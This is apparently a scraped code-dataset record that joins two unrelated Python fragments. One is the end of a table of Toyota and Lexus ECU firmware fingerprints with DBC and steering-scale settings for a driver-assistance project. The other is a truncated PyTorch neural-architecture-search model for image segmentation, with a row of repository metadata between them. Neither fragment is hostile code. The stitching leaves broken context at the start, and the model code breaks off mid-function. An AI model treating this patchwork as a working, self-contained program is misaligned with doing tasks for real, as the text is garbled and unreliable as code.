b'8965B24081\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F2402200\x00\x00\x00\x00',
],
},
CAR.LEXUS_RX: {
(Ecu.engine, 0x700, None): [
b'\x01896630E36200\x00\x00\x00\x00',
b'\x01896630E36300\x00\x00\x00\x00',
b'\x01896630E37200\x00\x00\x00\x00',
b'\x01896630E37300\x00\x00\x00\x00',
b'\x01896630E41000\x00\x00\x00\x00',
b'\x01896630E41100\x00\x00\x00\x00',
b'\x01896630E41200\x00\x00\x00\x00',
b'\x01896630E41500\x00\x00\x00\x00',
b'\x01896630EA3100\x00\x00\x00\x00',
b'\x01896630EA3400\x00\x00\x00\x00',
b'\x01896630EA4100\x00\x00\x00\x00',
b'\x01896630EA4300\x00\x00\x00\x00',
b'\x01896630EA4400\x00\x00\x00\x00',
b'\x01896630EA6300\x00\x00\x00\x00',
b'\x018966348R1300\x00\x00\x00\x00',
b'\x018966348R8500\x00\x00\x00\x00',
b'\x018966348W1300\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152648472\x00\x00\x00\x00\x00\x00',
b'F152648473\x00\x00\x00\x00\x00\x00',
b'F152648492\x00\x00\x00\x00\x00\x00',
b'F152648493\x00\x00\x00\x00\x00\x00',
b'F152648474\x00\x00\x00\x00\x00\x00',
b'F152648630\x00\x00\x00\x00\x00\x00',
b'F152648494\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514810300\x00\x00\x00\x00',
b'881514810500\x00\x00\x00\x00',
b'881514810700\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B0E011\x00\x00\x00\x00\x00\x00',
b'8965B0E012\x00\x00\x00\x00\x00\x00',
b'8965B48102\x00\x00\x00\x00\x00\x00',
b'8965B48111\x00\x00\x00\x00\x00\x00',
b'8965B48112\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4701000\x00\x00\x00\x00',
b'8821F4701100\x00\x00\x00\x00',
b'8821F4701200\x00\x00\x00\x00',
b'8821F4701300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4801100\x00\x00\x00\x00',
b'8646F4801200\x00\x00\x00\x00',
b'8646F4802001\x00\x00\x00\x00',
b'8646F4802100\x00\x00\x00\x00',
b'8646F4802200\x00\x00\x00\x00',
b'8646F4809000\x00\x00\x00\x00',
],
},
CAR.LEXUS_RXH: {
(Ecu.engine, 0x7e0, None): [
b'\x02348J7000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348N0000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348Q4000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348Q4100\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348T1100\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348T3000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348V6000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02348Z3000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152648361\x00\x00\x00\x00\x00\x00',
b'F152648501\x00\x00\x00\x00\x00\x00',
b'F152648502\x00\x00\x00\x00\x00\x00',
b'F152648504\x00\x00\x00\x00\x00\x00',
b'F152648740\x00\x00\x00\x00\x00\x00',
b'F152648A30\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514811300\x00\x00\x00\x00',
b'881514811500\x00\x00\x00\x00',
b'881514811700\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B0E011\x00\x00\x00\x00\x00\x00',
b'8965B0E012\x00\x00\x00\x00\x00\x00',
b'8965B48111\x00\x00\x00\x00\x00\x00',
b'8965B48112\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4701000\x00\x00\x00\x00',
b'8821F4701100\x00\x00\x00\x00',
b'8821F4701200\x00\x00\x00\x00',
b'8821F4701300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4801200\x00\x00\x00\x00',
b'8646F4802001\x00\x00\x00\x00',
b'8646F4802100\x00\x00\x00\x00',
b'8646F4802200\x00\x00\x00\x00',
b'8646F4809000\x00\x00\x00\x00',
],
},
CAR.LEXUS_RX_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896630EC9000\x00\x00\x00\x00',
b'\x01896634D12000\x00\x00\x00\x00',
b'\x01896630EB0000\x00\x00\x00\x00',
b'\x01896630EA9000\x00\x00\x00\x00',
b'\x01896630ED0000\x00\x00\x00\x00',
b'\x018966348W5100\x00\x00\x00\x00',
b'\x018966348W9000\x00\x00\x00\x00',
b'\x01896634D12100\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F152648801\x00\x00\x00\x00\x00\x00',
b'\x01F15260E031\x00\x00\x00\x00\x00\x00',
b'\x01F15260E041\x00\x00\x00\x00\x00\x00',
b'\x01F152648781\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B48261\x00\x00\x00\x00\x00\x00',
b'8965B48271\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4810200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F4810100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
],
},
CAR.LEXUS_RXH_TSS2: {
(Ecu.engine, 0x7e0, None): [
b'\x02348X8000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0234D14000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0234D16000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152648831\x00\x00\x00\x00\x00\x00',
b'F152648D00\x00\x00\x00\x00\x00\x00',
b'F152648D60\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B48271\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4810200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F4810100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
],
},
CAR.PRIUS_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x028966347B1000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347C6000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347C8000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x038966347C0000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710101\x00\x00\x00\x00',
b'\x038966347C1000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710101\x00\x00\x00\x00',
b'\x038966347C5000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4707101\x00\x00\x00\x00',
b'\x038966347C5100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4707101\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152647500\x00\x00\x00\x00\x00\x00',
b'F152647510\x00\x00\x00\x00\x00\x00',
b'F152647520\x00\x00\x00\x00\x00\x00',
b'F152647521\x00\x00\x00\x00\x00\x00',
b'F152647531\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B47070\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4707000\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F4710000\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
],
},
CAR.MIRAI: {
(Ecu.esp, 0x7D1, None): [b'\x01898A36203000\x00\x00\x00\x00',],
(Ecu.esp, 0x7B0, None): [b'\x01F15266203200\x00\x00\x00\x00',], # a second ESP ECU
(Ecu.eps, 0x7A1, None): [b'\x028965B6204100\x00\x00\x00\x008965B6203100\x00\x00\x00\x00',],
(Ecu.fwdRadar, 0x750, 0xf): [b'\x018821F6201200\x00\x00\x00\x00',],
(Ecu.fwdCamera, 0x750, 0x6d): [b'\x028646F6201400\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',],
},
CAR.ALPHARD_TSS2: {
(Ecu.engine, 0x7e0, None): [
b'\x0235870000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0235883000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B58040\x00\x00\x00\x00\x00\x00',
b'8965B58052\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F58010C0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F5803200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
],
},
}
STEER_THRESHOLD = 100
DBC = {
CAR.RAV4H: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.RAV4: dbc_dict('toyota_new_mc_pt_generated', 'toyota_adas'),
CAR.PRIUS: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
CAR.PRIUS_V: dbc_dict('toyota_new_mc_pt_generated', 'toyota_adas'),
CAR.COROLLA: dbc_dict('toyota_new_mc_pt_generated', 'toyota_adas'),
CAR.LEXUS_RC: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.LEXUS_RX: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.LEXUS_RXH: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.LEXUS_RX_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.LEXUS_RXH_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.CHR: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
CAR.CHRH: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
CAR.CAMRY: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
CAR.CAMRYH: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
CAR.CAMRY_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.CAMRYH_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.HIGHLANDER: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.HIGHLANDER_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.HIGHLANDERH: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.HIGHLANDERH_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.AVALON: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.AVALON_2019: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
CAR.AVALONH_2019: dbc_dict('toyota_nodsu_pt_generated', 'toyota_adas'),
CAR.AVALON_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.RAV4_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.COROLLA_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.COROLLAH_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.LEXUS_ES_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.LEXUS_ESH_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.LEXUS_ESH: dbc_dict('toyota_new_mc_pt_generated', 'toyota_adas'),
CAR.SIENNA: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.LEXUS_IS: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.LEXUS_CTH: dbc_dict('toyota_new_mc_pt_generated', 'toyota_adas'),
CAR.RAV4H_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.LEXUS_NXH: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.LEXUS_NX: dbc_dict('toyota_tnga_k_pt_generated', 'toyota_adas'),
CAR.LEXUS_NX_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.PRIUS_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.MIRAI: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
CAR.ALPHARD_TSS2: dbc_dict('toyota_nodsu_pt_generated', 'toyota_tss2_adas'),
}
# These cars have non-standard EPS torque scale factors. All others are 73
EPS_SCALE = defaultdict(lambda: 73, {CAR.PRIUS: 66, CAR.COROLLA: 88, CAR.LEXUS_IS: 77, CAR.LEXUS_RC: 77, CAR.LEXUS_CTH: 100, CAR.PRIUS_V: 100})
# Toyota/Lexus Safety Sense 2.0 and 2.5
TSS2_CAR = {CAR.RAV4_TSS2, CAR.COROLLA_TSS2, CAR.COROLLAH_TSS2, CAR.LEXUS_ES_TSS2, CAR.LEXUS_ESH_TSS2, CAR.RAV4H_TSS2,
CAR.LEXUS_RX_TSS2, CAR.LEXUS_RXH_TSS2, CAR.HIGHLANDER_TSS2, CAR.HIGHLANDERH_TSS2, CAR.PRIUS_TSS2, CAR.CAMRY_TSS2, CAR.CAMRYH_TSS2,
CAR.MIRAI, CAR.LEXUS_NX_TSS2, CAR.ALPHARD_TSS2, CAR.AVALON_TSS2}
NO_DSU_CAR = TSS2_CAR | {CAR.CHR, CAR.CHRH, CAR.CAMRY, CAR.CAMRYH}
# no resume button press required
NO_STOP_TIMER_CAR = TSS2_CAR | {CAR.PRIUS_V, CAR.RAV4H, CAR.HIGHLANDERH, CAR.HIGHLANDER, CAR.SIENNA, CAR.LEXUS_ESH}
| 42.359094 | 260 | 0.651152 |
ace980b445b470e6e67bda670f40cf5354d7a0ce | 33,841 | py | Python | modeling/model_net_search.py | HankKung/Dynamic-AutoDeepLab | 4150a19d632269f7ebcb63e92906a7f40e6a283b | [
"Apache-2.0"
] | 9 | 2020-02-12T07:20:42.000Z | 2021-10-16T06:36:19.000Z | modeling/model_net_search.py | HankKung/Distributed-AutoDeepLab | 4150a19d632269f7ebcb63e92906a7f40e6a283b | [
"Apache-2.0"
] | 2 | 2020-04-02T06:39:53.000Z | 2021-01-19T10:36:07.000Z | modeling/model_net_search.py | HankKung/Distributed-AutoDeepLab | 4150a19d632269f7ebcb63e92906a7f40e6a283b | [
"Apache-2.0"
] | 3 | 2020-02-28T22:15:34.000Z | 2021-08-05T07:26:03.000Z | import torch
import torch.nn as nn
import numpy as np
from modeling.genotypes import PRIMITIVES
import torch.nn.functional as F
from modeling.operations import *
from modeling.sync_batchnorm.batchnorm import SynchronizedBatchNorm2d
class Cell_fixed(nn.Module):
def __init__(self,
B,
prev_prev_C,
prev_C_down,
prev_C_same,
prev_C_up,
C_out,
cell,
BatchNorm=nn.BatchNorm2d,
pre_preprocess_sample_rate=1):
super(Cell_fixed, self).__init__()
eps = 1e-5
momentum = 0.1
self.B = B
self.cell_arch = cell
if prev_C_down is not None:
self.preprocess_down = FactorizedReduce(
prev_C_down, C_out, BatchNorm=BatchNorm, affine=False)
if prev_C_same is not None:
self.preprocess_same = ReLUConvBN(
prev_C_same, C_out, 1, 1, 0, BatchNorm=BatchNorm, affine=False)
if prev_C_up is not None:
self.preprocess_up = ReLUConvBN(
prev_C_up, C_out, 1, 1, 0, BatchNorm=BatchNorm, affine=False)
self._ops = nn.ModuleList()
if prev_prev_C != -1:
if pre_preprocess_sample_rate >= 1:
self.pre_preprocess = ReLUConvBN(
prev_prev_C, C_out, 1, 1, 0, BatchNorm=BatchNorm, affine=False)
elif pre_preprocess_sample_rate == 0.5:
self.pre_preprocess = FactorizedReduce(
prev_prev_C, C_out, BatchNorm=BatchNorm, affine=False)
elif pre_preprocess_sample_rate == 0.25:
self.pre_preprocess = DoubleFactorizedReduce(
prev_prev_C, C_out, BatchNorm=BatchNorm, affine=False)
for x in self.cell_arch:
primitive = PRIMITIVES[x[1]]
op = OPS[primitive](C_out, 1, BatchNorm, eps=eps, momentum=momentum, affine=False)
self._ops.append(op)
def scale_dimension(self, dim, scale):
return int((float(dim) - 1.0) * scale + 1.0)
def prev_feature_resize(self, prev_feature, mode):
if mode == 'down':
feature_size_h = self.scale_dimension(prev_feature.shape[2], 0.5)
feature_size_w = self.scale_dimension(prev_feature.shape[3], 0.5)
elif mode == 'up':
feature_size_h = self.scale_dimension(prev_feature.shape[2], 2)
feature_size_w = self.scale_dimension(prev_feature.shape[3], 2)
return F.interpolate(prev_feature, (feature_size_h, feature_size_w), mode='bilinear')
def forward(self, s0, s1_down, s1_same, s1_up):
if s1_down is not None:
s1_down = self.preprocess_down(s1_down)
size_h, size_w = s1_down.shape[2], s1_down.shape[3]
if s1_same is not None:
s1_same = self.preprocess_same(s1_same)
size_h, size_w = s1_same.shape[2], s1_same.shape[3]
if s1_up is not None:
s1_up = self.prev_feature_resize(s1_up, 'up')
s1_up = self.preprocess_up(s1_up)
size_h, size_w = s1_up.shape[2], s1_up.shape[3]
all_states = []
if s0 is not None:
s0 = F.interpolate(s0, (size_h, size_w), mode='bilinear') if (
s0.shape[2] < size_h) or (s0.shape[3] < size_w) else s0
s0 = self.pre_preprocess(s0)
if s1_down is not None:
states_down = [s0, s1_down]
all_states.append(states_down)
del s1_down
if s1_same is not None:
states_same = [s0, s1_same]
all_states.append(states_same)
del s1_same
if s1_up is not None:
states_up = [s0, s1_up]
all_states.append(states_up)
del s1_up
else:
if s1_down is not None:
states_down = [0, s1_down]
all_states.append(states_down)
if s1_same is not None:
states_same = [0, s1_same]
all_states.append(states_same)
if s1_up is not None:
states_up = [0, s1_up]
all_states.append(states_up)
del s0
final_concates = []
for states in all_states:
offset = 0
ops_index = 0
for i in range(self.B):
new_states = []
for j, h in enumerate(states):
branch_index = offset + j
if branch_index in self.cell_arch[:, 0]:
new_state = self._ops[ops_index](h)
new_states.append(new_state)
ops_index += 1
s = sum(new_states)
offset += len(states)
states.append(s)
concat_feature = torch.cat(states[-self.B:], dim=1)
final_concates.append(concat_feature)
return final_concates
class Model_net_search (nn.Module) :
def __init__(self,
num_classes,
num_layers,
args,
C_index=5,
alphas=None):
super(Model_net_search, self).__init__()
cell = Cell_fixed
BatchNorm = SynchronizedBatchNorm2d if args.sync_bn == True else nn.BatchNorm2d
self.cells = nn.ModuleList()
self._num_layers = num_layers
self._num_classes = num_classes
self.C_index = C_index
self._initialize_alphas_betas()
self.alphas = alphas
B = args.B
F = args.F
f_initial = F * B
half_f_initial = int(f_initial / 2)
FB = F * B
self.dense_preprocess = nn.ModuleList()
for i in range(self._num_layers-2):
if i == 0:
self.dense_preprocess.append(nn.ModuleList())
self.dense_preprocess[0].append(ReLUConvBN(FB, F, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
self.dense_preprocess[0].append(ReLUConvBN(FB * 2, F * 2, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
self.dense_preprocess[0].append(FactorizedReduce(FB * 2, F * 4, BatchNorm=BatchNorm, affine=False))
self.dense_preprocess[0].append(DoubleFactorizedReduce(FB * 2, F * 8, BatchNorm=BatchNorm, affine=False))
elif i == 1:
self.dense_preprocess.append(nn.ModuleList())
self.dense_preprocess[1].append(ReLUConvBN(FB, F, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
self.dense_preprocess[1].append(ReLUConvBN(FB * 2, F * 2, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
self.dense_preprocess[1].append(ReLUConvBN(FB * 4, F * 4, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
self.dense_preprocess[1].append(FactorizedReduce(FB * 4, F * 8, BatchNorm=BatchNorm, affine=False))
else:
self.dense_preprocess.append(nn.ModuleList())
self.dense_preprocess[i].append(ReLUConvBN(FB, F, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
self.dense_preprocess[i].append(ReLUConvBN(FB * 2, F * 2, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
self.dense_preprocess[i].append(ReLUConvBN(FB * 4, F * 4, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
self.dense_preprocess[i].append(ReLUConvBN(FB * 8, F * 8, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
self.stem0 = nn.Sequential(
nn.Conv2d(3, half_f_initial, 3, stride=2, padding=1, bias=False),
BatchNorm(half_f_initial),
)
self.stem1 = nn.Sequential(
nn.ReLU(),
nn.Conv2d(half_f_initial, f_initial, 3, stride=2, padding=1, bias=False),
BatchNorm(f_initial),
)
""" build the cells """
for i in range (self._num_layers):
if i == 0 :
cell1 = cell (B, half_f_initial,
None, f_initial, None,
F, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.5)
cell2 = cell (B, half_f_initial,
f_initial, None, None,
F * 2, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.25)
self.cells += [cell1]
self.cells += [cell2]
elif i == 1 :
cell1 = cell (B, f_initial,
None, FB, FB * 2,
F, alphas, BatchNorm=BatchNorm)
cell2 = cell (B, f_initial,
FB, FB * 2, None,
F * 2, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.5)
cell3 = cell (B, f_initial,
FB * 2, None, None,
F * 4, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.25)
self.cells += [cell1]
self.cells += [cell2]
self.cells += [cell3]
elif i == 2 :
cell1 = cell (B, FB,
None, FB, FB * 2,
F, alphas, BatchNorm=BatchNorm)
cell2 = cell (B, FB * 2,
FB, FB * 2, FB * 4,
F * 2, alphas, BatchNorm=BatchNorm)
cell3 = cell (B, FB * 2,
FB * 2, FB * 4, None,
F * 4, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.5)
cell4 = cell (B, FB * 2,
FB * 4, None, None,
F * 8, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.25)
self.cells += [cell1]
self.cells += [cell2]
self.cells += [cell3]
self.cells += [cell4]
else:
cell1 = cell (B, F * (i-1),
None, FB, FB * 2,
F, alphas, BatchNorm=BatchNorm)
cell2 = cell (B, F * (i-1) * 2,
FB, FB * 2, FB * 4,
F * 2, alphas, BatchNorm=BatchNorm)
cell3 = cell (B, F * (i-1) * 4,
FB * 2, FB * 4, FB * 8,
F * 4, alphas, BatchNorm=BatchNorm)
cell4 = cell (B, F * (i-1) * 8,
FB * 4, FB * 8, None,
F * 8, alphas, BatchNorm=BatchNorm)
self.cells += [cell1]
self.cells += [cell2]
self.cells += [cell3]
self.cells += [cell4]
self.aspp_4 = ASPP (FB, self._num_classes, 24, 24, BatchNorm=BatchNorm) #96 / 4 as in the paper
self.aspp_8 = ASPP (FB * 2, self._num_classes, 12, 12, BatchNorm=BatchNorm) #96 / 8
self.aspp_16 = ASPP (FB * 4, self._num_classes, 6, 6, BatchNorm=BatchNorm) #96 / 16
self.aspp_32 = ASPP (FB * 8, self._num_classes, 3, 3, BatchNorm=BatchNorm) #96 / 32
self._init_weight()
def forward (self, x) :
level_4 = []
level_8 = []
level_16 = []
level_32 = []
level_4_dense = []
level_8_dense = []
level_16_dense = []
level_32_dense = []
C_output_4 = []
C_output_8 = []
C_output_16 = []
C_output_32 = []
temp = self.stem0(x)
level_4.append (self.stem1(temp))
count = 0
normalized_betas = torch.randn(12, 4, 3).cuda().half()
""" Softmax on betas """
for layer in range (len(self.betas)):
if layer == 0:
normalized_betas[layer][0][1:] = F.softmax (self.betas[layer][0][1:], dim=-1) * (2/3)
elif layer == 1:
normalized_betas[layer][0][1:] = F.softmax (self.betas[layer][0][1:], dim=-1) * (2/3)
normalized_betas[layer][1] = F.softmax (self.betas[layer][1], dim=-1)
elif layer == 2:
normalized_betas[layer][0][1:] = F.softmax (self.betas[layer][0][1:], dim=-1) * (2/3)
normalized_betas[layer][1] = F.softmax (self.betas[layer][1], dim=-1)
normalized_betas[layer][2] = F.softmax (self.betas[layer][2], dim=-1)
else :
normalized_betas[layer][0][1:] = F.softmax (self.betas[layer][0][1:], dim=-1) * (2/3)
normalized_betas[layer][1] = F.softmax (self.betas[layer][1], dim=-1)
normalized_betas[layer][2] = F.softmax (self.betas[layer][2], dim=-1)
normalized_betas[layer][3][:2] = F.softmax (self.betas[layer][3][:2], dim=-1) * (2/3)
for layer in range (self._num_layers) :
if layer == 0 :
level4_new, = self.cells[count] (temp, None, level_4[-1], None)
count += 1
level8_new, = self.cells[count] (temp, level_4[-1], None, None)
count += 1
level4_new = normalized_betas[layer][0][1] * level4_new
level8_new = normalized_betas[layer][0][2] * level8_new
level_4.append (level4_new)
level_8.append (level8_new)
del temp
level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
level_16_dense.append(self.dense_preprocess[layer][2](level8_new))
level_32_dense.append(self.dense_preprocess[layer][3](level8_new))
elif layer == 1 :
level4_new_1, level4_new_2 = self.cells[count] (level_4[-2],
None,
level_4[-1],
level_8[-1])
level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
count += 1
level8_new_1, level8_new_2 = self.cells[count] (level_4[-2],
level_4[-1],
level_8[-1],
None)
level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2
count += 1
level16_new, = self.cells[count] (level_4[-2],
level_8[-1],
None,
None)
level16_new = normalized_betas[layer][1][2] * level16_new
count += 1
level_4.append (level4_new)
level_8.append (level8_new)
level_16.append (level16_new)
level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
level_16_dense.append(self.dense_preprocess[layer][2](level16_new))
level_32_dense.append(self.dense_preprocess[layer][3](level16_new))
elif layer == 2 :
level4_new_1, level4_new_2 = self.cells[count] (level_4[-2],
None,
level_4[-1],
level_8[-1])
count += 1
level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (level_8[-2],
level_4[-1],
level_8[-1],
level_16[-1])
level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
count += 1
level16_new_1, level16_new_2 = self.cells[count] (level_8[-2],
level_8[-1],
level_16[-1],
None)
level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2
count += 1
level32_new, = self.cells[count] (level_8[-2],
level_16[-1],
None,
None)
level32_new = normalized_betas[layer][2][2] * level32_new
count += 1
level_4.append (level4_new)
level_8.append (level8_new)
level_16.append (level16_new)
level_32.append (level32_new)
level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
level_16_dense.append(self.dense_preprocess[layer][2](level16_new))
level_32_dense.append(self.dense_preprocess[layer][3](level32_new))
if 2 in self.C_index:
C_output_4.append(self.aspp_4(level_4[-1]))
C_output_8.append(self.aspp_8(level_8[-1]))
C_output_16.append(self.aspp_16(level_16[-1]))
C_output_32.append(self.aspp_32(level_32[-1]))
elif layer == 3 :
level4_new_1, level4_new_2 = self.cells[count] (torch.cat(level_4_dense[:-1], dim=1),
None,
level_4[-1],
level_8[-1])
level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
count += 1
level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (torch.cat(level_8_dense[:-1], dim=1),
level_4[-1],
level_8[-1],
level_16[-1])
level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
count += 1
level16_new_1, level16_new_2, level16_new_3 = self.cells[count] (torch.cat(level_16_dense[:-1], dim=1),
level_8[-1],
level_16[-1],
level_32[-1])
level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2 + normalized_betas[layer][3][0] * level16_new_3
count += 1
